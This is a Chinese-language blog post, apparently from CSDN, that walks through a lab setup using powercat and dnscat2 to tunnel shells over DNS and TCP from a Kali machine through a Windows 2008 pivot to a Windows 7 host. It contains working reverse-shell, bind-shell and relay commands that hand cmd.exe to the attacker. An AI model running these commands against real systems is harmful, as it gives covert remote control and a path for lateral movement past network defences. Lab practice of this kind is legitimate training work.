Powercat DNS隧道的使用(附内网环境实现以及分享一些遇到的坑)

最新推荐文章于 2022-08-31 13:19:50 发布
最新推荐文章于 2022-08-31 13:19:50 发布
阅读量469 收藏
点赞数
分类专栏: 内网攻防 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/markecheng/article/details/110957741
版权

前言

上篇说到powercat 的基本使用,但是Powercat也是一种基于DNS协议的通信工具,powercar的DNS的通信就是基于DNScat设计的(服务端就是DNScat)我们的目的就是利用服务端的DNScat与目标机器中的powercat进行交互
网络环境:
在这里插入图片描述
使用机器:
kali攻击机、windows 2008 R2以及windows7作为主要机器
实现目标:
(1)kali使用Dnscat以及与windows 2008 产生交互
(2)以windows 2008 作为跳板机,基于TCP协议,kali获取windows 7的shell
(3)以windows 2008作为跳板机,基于DNS协议,kali获取windows 7的shell
首先,需要在kali上安装Dnscat
git clone https://github.com/iagox86/dnscat2.git
cd ./dnscat2/server
gem install bundler
bundle install
命令虽然是这样,但是,还有有一些坑点的,
在gem中,我们需要查看以下4个依赖包有没有安装
Ecdsa、salsa20、sha3、trollop
gem list 即可查看(安装了的话,跳过这一步)
如果没有安装的话呢:
root@kali:~# gem install ecdsa
root@kali:~# gem install salsa20
root@kali:~# gem install sha3
root@kali:~# gem install trollop
安装好就行了
在bundle install安装时,出现了这样
在这里插入图片描述
(图片里的意思是我们不能用root用户安装,那咋棒呢,我们就创建一个管理员权限的用户)
useradd -m name
usermod -a -g sudo name
passwd name
chsh -s /bin/bash name
然后步骤做完之后,我们则切换用户就行啦
su name
在进入./dnscat2/server目录下安装
bundle install
会出现要填写密码,密码就是我们passwd name中自己设置的密码
输入密码之后,即可安装,安装完成后,想要用回root用户来使用的话,直接输入exit就可以返回
目标实现步骤:
(1)在kali的./dnscat2/server目录下输入
ruby dnscat2.rb ttpowercat.test -e open --no-cache
就可以进入dnscat运行界面之后
在windows 2008 中输入
powercat -c 192.168.206.129 -p 53 -dns ttpowercat.test -e cmd.exe
在这里插入图片描述
kali 即可收到会话,后输入session -i 1
在这里插入图片描述
在这里插入图片描述
(2)在windows 7 中执行命令:
Powercat -l -v -p 9999 -e cmd.exe
在这里插入图片描述
在windows 2008 中执行命令:
Powercat -l -p 8888 -r tcp:10.1.1.4:9999
在这里插入图片描述
然后再Kali 攻击机中输入命令:
nc 192.168.206.129 -p 8888 -v
在这里插入图片描述
(3)kali中再/dnscat2/server目录下输入
ruby dnscat2.rb ttpowercat.test -e open --no-cache
在这里插入图片描述

windows 2008 中输入:
powercat -l -p 8888 -r -dns:192.168.206.131::ttpowercat.test
在这里插入图片描述
然后windows 7 中输入:
powercat -c 10.1.1.3 -p 8888 -v -e cmd.exe
在这里插入图片描述
执行成功之后,我们的kali攻击机即可获得session,效果如图:
在这里插入图片描述

phononer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
win10 mysql5安装图解_win10安装解压缩版mysql5或mysql8(图解)
weixin_33897085的博客
01-18 177
1.下载1.1 选择自己需要的版本:1.2 下一步2.解压缩到自定义的文件夹3.配置环境变量(我的是windows10系统,可不做此操作,后面步骤会有变化)3.1 打开系统环境变量3.2 添加系统变量变量名:MYSQL_HOME变量值:D:\Program Files\mysql-5.7.23-winx64 (这里填写你解压缩文件存放的目录)3.3 编辑Path变量填写内容:%MYSQL_HOME...
Windows安装 MySQL5.7(超详细)
最新发布
XiaoHH的博客
02-23 9334
Windows下安装MySQL5.7,步骤超详细
工具之powercat使用教程
shy的博客
10-06 3247
下载 地址:https://github.com/besimorhino/powercat 运行 使用: 由于PowerCat是NetCatPowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。 kali:192.168.206.128 win10:192.168.206.1 -eExecute. Specify the name of the process to start. 运行。开启运行一个程序 .
powercat工具详细分析
weixin_34128411的博客
09-18 2442
本文讲的是powercat工具详细分析,这个工具出来两年了,但是好像很少人知道他。国外的大牛们用的比较多,国内的文章出现powercat关键字的寥寥无几,更别说有这款工具的详细用法了。 0x01 powercat简介 是NetCatPowershell版本。作者的介绍也是这样写的,但是我觉得,powercat不管怎么样,也有比NetCat强的...
Windows10下安装MySQL5.0详细教程
唐传林的博客
03-18 3万+
Windows10下安装MySQL5.0详细教程 想记录一下这些步骤,以防时间久了忘记。 电脑环境: windows10教育版 64位 (OS内部版本:16299.125) 安装步骤: 1、到MySQL官网下载MySQL5.0安装程序。 注意:MySQL官网有好多个版本,本教程以MySQL5.0为例子进行介绍。 需要MySQL其他版本点击这里 2、解压后双击打开“Set...
powercat.ps1
09-23
https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
内网渗透课实验—传输层隧道通信.docx
08-29
传输层隧道通信是内网渗透实验中的一种重要技术,通过使用 powercat 和 ncpowercat 工具,我们可以实现远程连接和数据传输。同时,我们还可以使用桥接模式来实现远程连接,并使用 Linux 文本编辑器来显示行号。
内网渗透综合实验.docx
08-29
本文档主要讲解了内网渗透综合实验的相关知识点,包括内网通信、隧道通信、Powercat 和 nc 反弹 shell、DNS 隧道、ssh 隧道等。 一、内网通信 内网通信是指在局域网内部的计算机之间进行数据交换的过程。在本实验...
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash...[ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
Molex综合布线产品在比赛场馆的应用
03-03
Molex综合布线产品是网络基础设施建设中的关键组成部分,尤其在比赛场馆等高要求的环境中,其性能表现尤为重要。Molex提供的是一套全面的端到端解决方案,旨在确保整个网络信道的高效、稳定运行。这个系统设计时考虑...
Mysql 安装
dfplrtyx049773的博客
11-08 1039
Mysql 安装 环境:windwos 10(1511) 64bit、mysql 5.7.14 一、下载mysql 1. 在浏览器里打开mysql的官网http://www.mysql.com/ 2. 进入页面顶部的"Downloads" ...
Mysql5.7安装配置详细图文教程(安装包)
caidykojoy的博客
08-31 4万+
MySQL5.7最新安装配置教程,详细图文介绍。
Windows10安装Mysql5.7.19.0 msi 版本报错
weixin_34049032的博客
09-22 130
安装环境:Windows10安装版本:MySql 5.7.19.0 msi1.安装5.7.19.0 msi版本Mysql时报如下错误:2.根据日志分析是缺少visual Studio 2013 Redistributable3.下载完成后,安装仍然显示失败:4.在网上下载各种vs测试,发现都无法将MySQL Server安装上去。后来发现尝试使低版本5.7.17,非SqlSe...
MySQL5.7.20安装
热门推荐
马原的博客
10-27 5万+
MySQL5.7参考 http://blog.csdn.net/u013205623/article/details/79171698一、下载https://dev.mysql.com/downloads/mysql/按照自己电脑位数下载相应安装包 二、安装1. 解压到想要安装的目录 2. 新建一个my.ini 输入以下内容,安装目录记得改一下[client] port=3306 default-...
二、环境搭建 之 Windows10 安装 mysql5.5.56
weixin_30847865的博客
06-18 566
操作系统:Windows10 家庭中文版 mysql版本:5.5.56 下载地址:http://pan.baidu.com/s/1qXREZBQ 安装步骤:   1.找到下载的msi文件 右键菜单选择 安装:        2.点击 next :        3.同意协议,点击 next:        4.选择 custom,自定义安装:        5....
mysql5命令行安装教程_mysql5.7安装教程(windows)
weixin_39724287的博客
01-19 711
mysql5.7安装配置方法,整理一份分享给大家下载mysql 5.7.msi安装双击mysql.msi,按照提示安装。安装之后需要注意的问题(重点)设置mysql环境环境变量(让mysql在cmd中的任何路径下就可以被调用)1、鼠标右击计算机,点击属性2、选择高级系统变量设置,点击环境变量3、在系统变量里面选择PATH,点击编辑4、在最后添加 ";C:\Program Files\MySQL\M...
win32 Mysql5.7.27安装教程
zhaoyalan2的博客
08-23 4706
Mysql可以安装到C盘,也可以安装到D盘。事实上Mysql本身安装程序不大,但数据可能会越来越大,所以可将data数据文件夹复制到D盘。本篇主要讲述将Mysql安装到D盘上的教程以及可能出现的问题。
DNS隧道工具』— dnscat2
localhost01
01-22 1万+
一、入必读 1、简介 Dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell…… 使用热度: ★★★★☆ 2、专业词 主控机:黑客方 被控机:受害者 Type:DNS解析的类型,常见的有:A、CNAME、MX、TXT…… 3、放哪儿 主控机 被控机 ......
win10环境下MySql(5.7.21版本)安装过程
董_不懂的博客
02-13 1万+
下载 1.进入下载地址:https://dev.mysql.com/downloads/mysql/ 2.进入下载界面:首先第一步选择DOWNLOADS,然后下面的Windows,然后选择MySQL Installer。 进入如下界面。 3.选择下载链接:选择图示Download 4.点击下载 5.选择适当位置下载 安装 1.下载完成后点击下载文件mysql-ins...
内网渗透实验:传输层隧道DNS隧道技术
实验中涉及到的工具包括Powercat、nc(Netcat)以及Wireshark,目的是实现内网穿透和文件传输,并通过DNS隧道进行通信。" 在内网渗透过程中,传输层隧道通信是一种常用的手段,用于在被隔离的网络之间建立通信通道...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值